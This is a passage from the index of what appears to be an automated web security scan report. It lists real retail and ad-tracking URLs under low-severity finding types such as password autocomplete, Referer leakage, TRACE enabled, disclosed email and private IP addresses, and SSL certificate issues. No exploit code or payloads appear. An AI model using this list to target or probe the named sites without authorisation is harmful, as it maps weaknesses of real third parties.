13.165. http://www.imiclk.com/cgi/r.cgi

13.166. http://www.orderhouse.com/

13.167. http://www.petco.com/

13.168. http://www.petco.com/Secure/Login.aspx

13.169. http://www.redcrossstore.org/

13.170. http://www.restorationhardware.com/

13.171. http://www.restorationhardware.com/content/promo.jsp

13.172. http://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

13.173. https://www.restorationhardware.com/my-account/forgot-password.jsp

13.174. https://www.restorationhardware.com/my-account/register.jsp

13.175. https://www.restorationhardware.com/my-account/sign-in.jsp

13.176. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

13.177. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

13.178. http://www.toshibadirect.com/td/b2c/laptops.to

13.179. http://www22.glam.com/cTagsImgCmd.act

13.180. http://www26.orientaltrading.com/cm

14. Password field with autocomplete enabled

14.1. https://ordering.ftd.com/new-signup/

14.2. https://ordering.ftd.com/new-signup/

14.3. https://ordering.ftd.com/new-signup/

14.4. https://ordering.ftd.com/new-signup/

14.5. https://ordering.ftd.com/reminder-signin/

14.6. https://ordering.ftd.com/reminder-signin/

14.7. https://ordering.ftd.com/reminder-signin/

14.8. https://ordering.ftd.com/reminder-signin/

14.9. https://ordering.ftd.com/reminder-signin/

14.10. https://ordering.ftd.com/signin/

14.11. https://ordering.ftd.com/signin/

14.12. https://ordering.ftd.com/signin/

14.13. https://ordering.ftd.com/signin/

14.14. https://secure.bhphotovideo.com/bnh/controller/home

14.15. https://secure.bhphotovideo.com/bnh/controller/home

14.16. https://secure.bluenile.com/accounts/account-sign-in.html

14.17. https://secure.bluenile.com/accounts/account-sign-in.html

14.18. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

14.19. http://shoprunner.force.com/content/JsContentElementsGNC

14.20. http://shoprunner.force.com/content/JsContentElementsPET

14.21. https://www.acehardware.com/checkout/index.jsp

14.22. https://www.acehardware.com/checkout/index.jsp

14.23. https://www.armaniexchange.com/account/login.do

14.24. https://www.armaniexchange.com/account/login.do

14.25. http://www.bluefly.com/myfly/login.jsp

14.26. http://www.bluefly.com/myfly/login.jsp

14.27. http://www.footlocker.com/login/login_form.cfm

14.28. https://www.footlocker.com/account/default.cfm

14.29. https://www.footlocker.com/account/default/

14.30. http://www.ftd.com/

14.31. http://www.ftd.com/

14.32. http://www.ftd.com/

14.33. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

14.34. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

14.35. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

14.36. https://www.gnc.com/checkout/index.jsp

14.37. https://www.guitarcenter.com/MyAccount/Login.aspx

14.38. https://www.helzberg.com/account/login.do

14.39. https://www.orderhouse.com/default.aspx

14.40. https://www.orderhouse.com/dp.aspx

14.41. https://www.orderhouse.com/dp.aspx

14.42. https://www.petsmart.com/checkout/index.jsp

14.43. https://www.petsmart.com/checkout/index.jsp

14.44. https://www.redcrossstore.org/dp.aspx

14.45. https://www.restorationhardware.com/my-account/register.jsp

14.46. https://www.restorationhardware.com/my-account/sign-in.jsp

15. Source code disclosure

15.1. http://www.brookstone.com/brookstone.js

15.2. https://www.brookstone.com/brookstone.js

16. Referer-dependent response

16.1. http://action.media6degrees.com/orbserv/hbjs

16.2. http://ads.adbrite.com/adserver/vdi/684339

16.3. https://secure.bluenile.com/accounts/account-sign-in.html

16.4. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget

16.5. http://www.facebook.com/plugins/like.php

16.6. http://www.facebook.com/plugins/likebox.php

16.7. https://www.guitarcenter.com/MyAccount/Login.aspx

17. Cross-domain Referer leakage

17.1. http://american.redcross.org/site/PageServer

17.2. http://bp.specificclick.net/

17.3. http://bp.specificclick.net/

17.4. http://bp.specificclick.net/

17.5. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

17.6. http://cm.g.doubleclick.net/pixel

17.7. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

17.8. http://fls.doubleclick.net/activityi

17.9. http://fls.doubleclick.net/activityi

17.10. http://fls.doubleclick.net/activityi

17.11. http://fls.doubleclick.net/activityi

17.12. http://fls.doubleclick.net/activityi

17.13. http://fls.doubleclick.net/activityi

17.14. http://hire.jobvite.com/CompanyJobs/Careers.aspx

17.15. http://html.aggregateknowledge.com/iframe

17.16. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

17.17. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

17.18. http://t.p.mybuys.com/webrec/wr.do

17.19. http://t.p.mybuys.com/webrec/wr.do

17.20. http://t.p.mybuys.com/webrec/wr.do

17.21. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

17.22. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

17.23. http://www.acehardware.com/category/index.jsp

17.24. http://www.acehardware.com/home/index.jsp

17.25. http://www.acehardware.com/home/index.jsp

17.26. https://www.acehardware.com/checkout/index.jsp

17.27. http://www.bhphotovideo.com/bnh/controller/home

17.28. http://www.bluefly.com/myfly/login.jsp

17.29. http://www.bluenile.com/build-your-own-diamond-ring

17.30. http://www.bluenile.com/engagement-rings

17.31. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

17.32. http://www.brookstone.com/outdoor-living.html

17.33. https://www.brookstone.com/formhandlerservlet

17.34. http://www.facebook.com/plugins/like.php

17.35. http://www.facebook.com/plugins/like.php

17.36. http://www.facebook.com/plugins/likebox.php

17.37. https://www.footlocker.com/account/default.cfm

17.38. http://www.gnc.com/home/index.jsp

17.39. https://www.gnc.com/checkout/index.jsp

17.40. http://www.guitarcenter.com/

17.41. https://www.guitarcenter.com/MyAccount/Login.aspx

17.42. https://www.helzberg.com/account/login.do

17.43. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

17.44. http://www.imiclk.com/cgi/r.cgi

17.45. http://www.imiclk.com/cgi/r.cgi

17.46. http://www.imiclk.com/cgi/r.cgi

17.47. http://www.imiclk.com/cgi/r.cgi

17.48. http://www.petco.com/

17.49. http://www.petco.com/Secure/Login.aspx

17.50. http://www.petsmart.com/

17.51. https://www.petsmart.com/checkout/index.jsp

17.52. http://www.redcrossstore.org/Shopper/Product.aspx

17.53. http://www.redcrossstore.org/dp.aspx

17.54. http://www.redcrossstore.org/shopper/prodlist.aspx

17.55. https://www.redcrossstore.org/dp.aspx

17.56. http://www.restorationhardware.com/content/promo.jsp

17.57. https://www.restorationhardware.com/my-account/sign-in.jsp

17.58. http://www.siteadvisor.com/download/windows.html

17.59. http://www.toshibadirect.com/td/b2c/laptops.to

17.60. http://www.toshibadirect.com/td/b2c/laptops.to

18. Cross-domain script include

18.1. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

18.2. http://fls.doubleclick.net/activityi

18.3. http://fls.doubleclick.net/activityi

18.4. http://fls.doubleclick.net/activityi

18.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx

18.6. https://ordering.ftd.com/new-signup/

18.7. https://ordering.ftd.com/reminder-signin/

18.8. https://ordering.ftd.com/signin/

18.9. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

18.10. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

18.11. http://shop.pacsun.com/home.jsp

18.12. http://subscriptions.marvel.com/

18.13. http://subscriptions.marvel.com/checkout/

18.14. https://subscriptions.marvel.com/checkout/

18.15. http://www.acehardware.com/category/index.jsp

18.16. http://www.acehardware.com/home/index.jsp

18.17. https://www.acehardware.com/checkout/index.jsp

18.18. http://www.armaniexchange.com/category/womens.do

18.19. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

18.20. http://www.bluefly.com/

18.21. http://www.bluenile.com/

18.22. http://www.bluenile.com/build-your-own-diamond-ring

18.23. http://www.bluenile.com/engagement-rings

18.24. http://www.brookstone.com/

18.25. http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html

18.26. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

18.27. http://www.brookstone.com/outdoor-living.html

18.28. http://www.brookstone.com/shoppingCart.jsp.vr

18.29. https://www.brookstone.com/formhandlerservlet

18.30. http://www.facebook.com/plugins/like.php

18.31. http://www.facebook.com/plugins/likebox.php

18.32. http://www.footlocker.com/

18.33. https://www.footlocker.com/account/default.cfm

18.34. https://www.footlocker.com/account/default/

18.35. http://www.ftd.com/

18.36. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

18.37. http://www.gnc.com/community/index.jsp%20%20

18.38. http://www.gnc.com/home/index.jsp

18.39. https://www.gnc.com/checkout/index.jsp

18.40. http://www.guitarcenter.com/

18.41. https://www.guitarcenter.com/MyAccount/Login.aspx

18.42. http://www.helzberg.com/

18.43. https://www.helzberg.com/account/login.do

18.44. http://www.homedepot.ca/catalog/concrete/173198

18.45. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

18.46. http://www.orientaltrading.com/

18.47. http://www.petco.com/

18.48. http://www.petsmart.com/

18.49. https://www.petsmart.com/checkout/index.jsp

18.50. http://www.redcrossstore.org/

18.51. http://www.redcrossstore.org/dp.aspx

18.52. http://www.redcrossstore.org/shopper/prodlist.aspx

18.53. http://www.siteadvisor.com/download/windows.html

18.54. http://www.toshibadirect.com/td/b2c/laptops.to

18.55. https://www.toshibadirect.com/td/b2c/myaccount.to

18.56. http://www.travelguard.com/

19. TRACE method is enabled

19.1. http://ads.al.com/

19.2. http://bp.specificclick.net/

19.3. http://d.xp1.ru4.com/

19.4. http://image2.pubmatic.com/

19.5. http://img.bluenile.com/

19.6. http://login.dotomi.com/

19.7. http://media.gnc.com/

19.8. http://media.gsimedia.net/

19.9. http://metrics.pacsun.com/

19.10. http://pixel.rubiconproject.com/

19.11. http://pixel.traveladvertising.com/

19.12. http://s.xp1.ru4.com/

19.13. http://secure-us.imrworldwide.com/

19.14. http://srv.clickfuse.com/

19.15. http://sv.liveclicker.net/

19.16. http://wasc.homedepot.ca/

19.17. https://www.toshibadirect.com/

20. Email addresses disclosed

20.1. http://ads.adbrite.com/adserver/vdi/684339

20.2. http://ads.adbrite.com/adserver/vdi/684339

20.3. http://ads.adbrite.com/adserver/vdi/684339

20.4. http://buy.travelguard.com/tgi2/js/siteCatalyst.js

20.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx

20.6. http://hire.jobvite.com/CompanyJobs/careers_8.js

20.7. https://ordering.ftd.com/new-signup/

20.8. https://ordering.ftd.com/reminder-signin/

20.9. https://ordering.ftd.com/signin/

20.10. http://pics.bluenile.com/1526758349/bundles/diamondsearch.js

20.11. https://secure.bhphotovideo.com/FrameWork/js/common.js

20.12. https://secure.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

20.13. https://secure.bluenile.com/accounts/account-sign-in.html

20.14. http://shop.pacsun.com/home.jsp

20.15. http://shoprunner.force.com/content/JsContentElementsGNC

20.16. http://shoprunner.force.com/content/JsContentElementsPET

20.17. http://static.bhphotovideo.com/FrameWork/js/common.js

20.18. http://www.acehardware.com/js/LIB_core.js

20.19. https://www.acehardware.com/checkout/index.jsp

20.20. https://www.acehardware.com/common/checkout/js/jsu-1.0.js

20.21. https://www.acehardware.com/js/LIB_core.js

20.22. http://www.armaniexchange.com/category/customer+service/where+is+my+order/check+order+status.do

20.23. http://www.bhphotovideo.com/FrameWork/js/common.js

20.24. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.placeHolder.js

20.25. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

20.26. http://www.bluenile.com/

20.27. http://www.bluenile.com/build-your-own-diamond-ring

20.28. http://www.bluenile.com/engagement-rings

20.29. http://www.brookstone.com/protoculous_102.js

20.30. https://www.brookstone.com/protoculous_102.js

20.31. http://www.ftd.com/

20.32. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

20.33. https://www.gnc.com/common/checkout/js/jsu-1.0.js

20.34. https://www.guitarcenter.com/includes/guitarcenter/GuitarCenter.css

20.35. https://www.guitarcenter.com/includes/guitarcenter/scripts/jquery.colorbox-min.js

20.36. https://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js

20.37. http://www.petsmart.com/js/LIB_core.js

20.38. https://www.petsmart.com/checkout/index.jsp

20.39. https://www.petsmart.com/js/LIB_core.js

20.40. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js

20.41. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js

20.42. http://www.travelguard.com/

21. Private IP addresses disclosed

21.1. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

21.2. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

21.3. http://rya.rockyou.com/ams/ptrck.php

21.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.5. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

21.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js

21.7. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JS3nOGeZ6_r.js

21.8. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

21.9. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png

21.10. http://subscriptions.marvel.com/

21.11. http://subscriptions.marvel.com/checkout/

21.12. https://subscriptions.marvel.com/checkout/

21.13. http://www.facebook.com/extern/login_status.php

21.14. http://www.facebook.com/extern/login_status.php

21.15. http://www.facebook.com/extern/login_status.php

21.16. http://www.facebook.com/extern/login_status.php

21.17. http://www.facebook.com/plugins/like.php

21.18. http://www.facebook.com/plugins/like.php

21.19. http://www.facebook.com/plugins/like.php

21.20. http://www.facebook.com/plugins/like.php

21.21. http://www.facebook.com/plugins/like.php

21.22. http://www.facebook.com/plugins/like.php

21.23. http://www.facebook.com/plugins/like.php

21.24. http://www.facebook.com/plugins/like.php

21.25. http://www.facebook.com/plugins/like.php

21.26. http://www.facebook.com/plugins/like.php

21.27. http://www.facebook.com/plugins/like.php

21.28. http://www.facebook.com/plugins/like.php

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.facebook.com/plugins/like.php

21.31. http://www.facebook.com/plugins/like.php

21.32. http://www.facebook.com/plugins/like.php

21.33. http://www.facebook.com/plugins/like.php

21.34. http://www.facebook.com/plugins/like.php

21.35. http://www.facebook.com/plugins/like.php

21.36. http://www.facebook.com/plugins/like.php

21.37. http://www.facebook.com/plugins/like.php

21.38. http://www.facebook.com/plugins/like.php

21.39. http://www.facebook.com/plugins/like.php

21.40. http://www.facebook.com/plugins/like.php

21.41. http://www.facebook.com/plugins/like.php

21.42. http://www.facebook.com/plugins/like.php

21.43. http://www.facebook.com/plugins/like.php

21.44. http://www.facebook.com/plugins/like.php

21.45. http://www.facebook.com/plugins/like.php

21.46. http://www.facebook.com/plugins/like.php

21.47. http://www.facebook.com/plugins/like.php

21.48. http://www.facebook.com/plugins/like.php

21.49. http://www.facebook.com/plugins/like.php

21.50. http://www.facebook.com/plugins/like.php

21.51. http://www.facebook.com/plugins/like.php

21.52. http://www.facebook.com/plugins/like.php

21.53. http://www.facebook.com/plugins/like.php

21.54. http://www.facebook.com/plugins/like.php

21.55. http://www.facebook.com/plugins/like.php

21.56. http://www.facebook.com/plugins/like.php

21.57. http://www.facebook.com/plugins/like.php

21.58. http://www.facebook.com/plugins/like.php

21.59. http://www.facebook.com/plugins/like.php

21.60. http://www.facebook.com/plugins/like.php

21.61. http://www.facebook.com/plugins/like.php

21.62. http://www.facebook.com/plugins/like.php

21.63. http://www.facebook.com/plugins/like.php

21.64. http://www.facebook.com/plugins/like.php

21.65. http://www.facebook.com/plugins/like.php

21.66. http://www.facebook.com/plugins/like.php

21.67. http://www.facebook.com/plugins/like.php

21.68. http://www.facebook.com/plugins/like.php

21.69. http://www.facebook.com/plugins/like.php

21.70. http://www.facebook.com/plugins/like.php

21.71. http://www.facebook.com/plugins/like.php

21.72. http://www.facebook.com/plugins/like.php

21.73. http://www.facebook.com/plugins/like.php

21.74. http://www.facebook.com/plugins/like.php

21.75. http://www.facebook.com/plugins/like.php

21.76. http://www.facebook.com/plugins/like.php

21.77. http://www.facebook.com/plugins/like.php

21.78. http://www.facebook.com/plugins/like.php

21.79. http://www.facebook.com/plugins/like.php

21.80. http://www.facebook.com/plugins/like.php

21.81. http://www.facebook.com/plugins/like.php

21.82. http://www.facebook.com/plugins/like.php

21.83. http://www.facebook.com/plugins/like.php

21.84. http://www.facebook.com/plugins/like.php

21.85. http://www.facebook.com/plugins/like.php

21.86. http://www.facebook.com/plugins/like.php

21.87. http://www.facebook.com/plugins/like.php

21.88. http://www.facebook.com/plugins/likebox.php

21.89. http://www.facebook.com/plugins/likebox.php

22. Robots.txt file

22.1. http://4qinvite.4q.iperceptions.com/1.aspx

22.2. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

22.3. http://a.netmng.com/

22.4. http://a.rfihub.com/ca.gif

22.5. http://a.tribalfusion.com/i.cid

22.6. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg

22.7. http://action.media6degrees.com/orbserv/hbjs

22.8. http://ad.afy11.net/ad

22.9. http://ad.doubleclick.net/activity

22.10. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123

22.11. http://ads.undertone.com/f

22.12. http://altfarm.mediaplex.com/ad/bk/17038-128025-3840-0

22.13. http://american.redcross.org/site/PageServer

22.14. http://b.scorecardresearch.com/p

22.15. http://beacon.afy11.net/ad

22.16. http://bluefly-www.baynote.net/baynote/tags2/policy

22.17. http://bluefly.com/

22.18. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

22.19. http://buy.travelguard.com/TGI2/proc/stateselector.aspx

22.20. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s05366524336859

22.21. http://cimg-1.restorationhardware.com/cm

22.22. http://cm.g.doubleclick.net/pixel

22.23. http://community.petco.com/n/pfx/forum.aspx

22.24. http://customerappreciation.petco.com/cm

22.25. http://d.xp1.ru4.com/activity

22.26. http://data.coremetrics.com/cm

22.27. http://dis.us.criteo.com/dis/dis.aspx

22.28. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

22.29. http://feeds.bbci.co.uk/news/rss.xml

22.30. http://fls.doubleclick.net/activityi

22.31. http://gnc.imageg.net/min-cat/site-css.xml.min.css

22.32. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052618686/

22.33. http://gsicace.112.2o7.net/b/ss/gsicace/1/H.20.3/s01026654783636

22.34. http://hire.jobvite.com/CompanyJobs/Careers.aspx

22.35. http://images.scanalert.com/meter/www.mcafee.com/55.gif

22.36. http://login.dotomi.com/ucm/UCMController

22.37. http://marketlive.122.2o7.net/b/ss/mlhelzbprod/1/H.20.3/s05609032628126

22.38. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

22.39. http://media.gnc.com/ipixel

22.40. http://media.gsimedia.net/ipixel

22.41. http://media2.legacy.com/bind

22.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

22.43. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s04212323604151

22.44. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s06308770310133

22.45. http://metrics.mcafee.com/b/ss/mcafeecomglobal/1/H.21/s0464884343091

22.46. http://metrics.pacsun.com/b/ss/pacsuncom/1/H.21/s03375264031346

22.47. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s02726066182367

22.48. http://mlarmani.122.2o7.net/b/ss/mlax5prod/1/H.10-Pdvu-2/s03885870138183

22.49. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

22.50. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s07987988402601

22.51. https://ordering.ftd.com/signin/

22.52. http://pet.imageg.net/favicon.ico

22.53. http://pixel.mathtag.com/event/img

22.54. http://r.turn.com/r/beacon

22.55. http://rpt.footlocker.com/eluminate

22.56. http://rs.instantservice.com/resources/smartbutton/7664/44640/available.gif

22.57. http://s.petco.com/js_raw/mtagconfig.js

22.58. http://s.xp1.ru4.com/meta

22.59. https://secure.bhphotovideo.com/bnh/controller/home

22.60. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

22.61. http://segment-pixel.invitemedia.com/pixel

22.62. http://server.bhphotovideo.com/cm

22.63. http://shop.pacsun.com/home.jsp

22.64. http://srv.clickfuse.com/pixels/create.php

22.65. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.66. http://static.bhphotovideo.com/FrameWork/css/min/reset-fonts-layout.css

22.67. http://subscriptions.marvel.com/

22.68. https://subscriptions.marvel.com/checkout/

22.69. http://sv.liveclicker.net/service/api

22.70. http://sync.mathtag.com/sync/img

22.71. http://t.p.mybuys.com/webrec/wr.do

22.72. http://tag.admeld.com/pixel

22.73. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

22.74. http://tracking.searchmarketing.com/welcome.asp

22.75. http://trvlgrd.netmng.com/

22.76. http://uat.netmng.com/pixel/

22.77. http://wasc.homedepot.ca/b/ss/homedepotca/1/H.22.1/s06511195921339

22.78. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget

22.79. http://www.acehardware.com/home/index.jsp

22.80. https://www.acehardware.com/coreg/index.jsp

22.81. http://www.armaniexchange.com/category/womens.do

22.82. https://www.armaniexchange.com/account/login.do

22.83. http://www.bhphotovideo.com/bnh/controller/home

22.84. http://www.bluefly.com/__ssobj/ard.png

22.85. http://www.bluenile.com/

22.86. https://www.brookstone.com/imageservlet

22.87. http://www.facebook.com/plugins/like.php

22.88. http://www.footlocker.com/

22.89. https://www.footlocker.com/account/default.cfm

22.90. http://www.ftd.com/

22.91. http://www.gnc.com/home/index.jsp

22.92. https://www.gnc.com/coreg/index.jsp

22.93. http://www.google-analytics.com/__utm.gif

22.94. http://www.googleadservices.com/pagead/conversion/1052618686/

22.95. http://www.guitarcenter.com/

22.96. https://www.guitarcenter.com/MyAccount/Default.aspx

22.97. http://www.helzberg.com/

22.98. https://www.helzberg.com/account/login.do

22.99. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home

22.100. http://www.imiclk.com/cgi/r.cgi

22.101. http://www.linkedin.com/companyInsider

22.102. http://www.orderhouse.com/

22.103. https://www.orderhouse.com/default.aspx

22.104. http://www.orientaltrading.com/

22.105. http://www.petco.com/

22.106. http://www.petsmart.com/

22.107. https://www.petsmart.com/coreg/index.jsp

22.108. http://www.redcrossstore.org/

22.109. https://www.redcrossstore.org/Shopper/ContactInfo.aspx

22.110. http://www.res-x.com/ws/r2/Resonance.aspx

22.111. http://www.restorationhardware.com/

22.112. https://www.restorationhardware.com/my-account/sign-in.jsp

22.113. http://www.siteadvisor.com/download/windows.html

22.114. http://www.toshibadirect.com/td/b2c/laptops.to

22.115. https://www.toshibadirect.com/td/b2c/myaccount.to

22.116. http://www.travelguard.com/

22.117. http://www26.orientaltrading.com/cm

23. Cacheable HTTPS response

23.1. https://ordering.ftd.com/empty/index.epl

23.2. https://secure.bluenile.com/accounts/account-sign-in.html

23.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

23.4. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

23.5. https://subscriptions.marvel.com/checkout/

23.6. https://subscriptions.marvel.com/favicon.ico

23.7. https://www.acehardware.com/include/emailSignup.html

23.8. https://www.armaniexchange.com/pageloading.html

23.9. https://www.footlocker.com/account/default.cfm

23.10. https://www.footlocker.com/account/default/

23.11. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

23.12. https://www.guitarcenter.com/MyAccount/Login.aspx

23.13. https://www.orderhouse.com/default.aspx

23.14. https://www.orderhouse.com/dp.aspx

23.15. https://www.petsmart.com/helpdesk/password-pop-up.jsp

23.16. https://www.redcrossstore.org/dp.aspx

23.17. https://www.restorationhardware.com/my-account/forgot-password.jsp

23.18. https://www.restorationhardware.com/my-account/register.jsp

23.19. https://www.restorationhardware.com/my-account/sign-in.jsp

23.20. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

23.21. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

23.22. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

23.23. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

23.24. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

23.25. https://www.toshibadirect.com/td/b2c/headerAjax.jsp

23.26. https://www.toshibadirect.com/td/b2c/myaccount.to

24. Multiple content types specified

24.1. http://tags.mediaforge.com/if/50

24.2. http://tags.mediaforge.com/pix/50

25. HTML does not specify charset

25.1. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

25.2. http://fls.doubleclick.net/activityi

25.3. http://media.gnc.com/ipixel

25.4. http://media.gsimedia.net/ipixel

25.5. https://ordering.ftd.com/empty/index.epl

25.6. https://ordering.ftd.com/new-signup/

25.7. https://ordering.ftd.com/reminder-signin/

25.8. https://ordering.ftd.com/signin/

25.9. http://s.xp1.ru4.com/meta

25.10. https://secure.bhphotovideo.com/tryagainlater.html

25.11. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

25.12. https://www.armaniexchange.com/pageloading.html

25.13. http://www.bhphotovideo.com/tryagainlater.html

25.14. http://www.bluenile.com/images2/spix.gif

25.15. http://www.ftd.com/

25.16. http://www.ftd.com/empty/tealeaf.epl

25.17. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

26. Content type incorrectly stated

26.1. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/1785161427

26.2. http://a.monetate.net/trk/3/s/a-546f7653/p/petco.com/873421027

26.3. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1081786236

26.4. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1469778385

26.5. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1491479342

26.6. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1537867128

26.7. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/1729776125

26.8. http://a.monetate.net/trk/3/s/a-721e8746/p/gnc.com/180141734

26.9. http://a.monetate.net/trk/3/s/a-835fc909/p/orientaltrading.com/927745947

26.10. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1276278800

26.11. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/1821464581

26.12. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/2142672001

26.13. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/491884791

26.14. http://a.monetate.net/trk/3/s/a-cb0f3ec6/p/petsmart.com/598788637

26.15. http://a.netmng.com/

26.16. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg

26.17. http://action.media6degrees.com/orbserv/hbjs

26.18. http://app.gnc.com/profile/javascript/utils.js

26.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

26.20. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

26.21. http://eval.bizrate.com/js/survey_126457_1.js

26.22. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

26.23. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

26.24. http://px.steelhousemedia.com/pr

26.25. http://rya.rockyou.com/ams/ptrck.php

26.26. http://s.xp1.ru4.com/meta

26.27. http://sales.liveperson.net/hcp/html/mTag.js

26.28. https://secure.bhphotovideo.com/images/!crd_prm!.!cm

26.29. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

26.30. http://shop.pacsun.com/js/widget-qv-uc.jsp

26.31. http://sr2.liveperson.net/hcp/html/mTag.js

26.32. https://subscriptions.marvel.com/favicon.ico

26.33. http://trvlgrd.netmng.com/

26.34. http://www.facebook.com/extern/login_status.php

26.35. http://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

26.36. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif

26.37. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

26.38. http://www.linkedin.com/companyInsider

26.39. https://www.orderhouse.com/Navigation/DisplayImage.aspx

26.40. http://www.petco.com/Handlers/Navigation/MegaMenuHandler.ashx

26.41. http://www.res-x.com/ws/r2/Resonance.aspx

26.42. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

26.43. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

26.44. http://www.siteadvisor.com/images/logo.gif

26.45. http://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

26.46. http://www.toshibadirect.com/td/b2c/headerAjax.jsp

26.47. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

26.48. https://www.toshibadirect.com/td/b2c/headerAjax.jsp

27. Content type is not specified

27.1. https://secure.bluenile.com/favicon.ico

27.2. http://www.bluenile.com/favicon.ico

27.3. http://www.helzberg.com/

27.4. https://www.helzberg.com/account/login.do

27.5. https://www.helzberg.com/account/passwordrecovery.do

28. SSL certificate

28.1. https://ordering.ftd.com/

28.2. https://secure.bhphotovideo.com/

28.3. https://secure.bluenile.com/

28.4. https://secure.homedepot.ca/

28.5. https://secure.orientaltrading.com/

28.6. https://subscriptions.marvel.com/

28.7. https://www.acehardware.com/

28.8. https://www.armaniexchange.com/

28.9. https://www.brookstone.com/

28.10. https://www.footlocker.com/

28.11. https://www.gnc.com/

28.12. https://www.guitarcenter.com/

28.13. https://www.helzberg.com/

28.14. https://www.orderhouse.com/

28.15. https://www.petsmart.com/

28.16. https://www.redcrossstore.org/

28.17. https://www.restorationhardware.com/

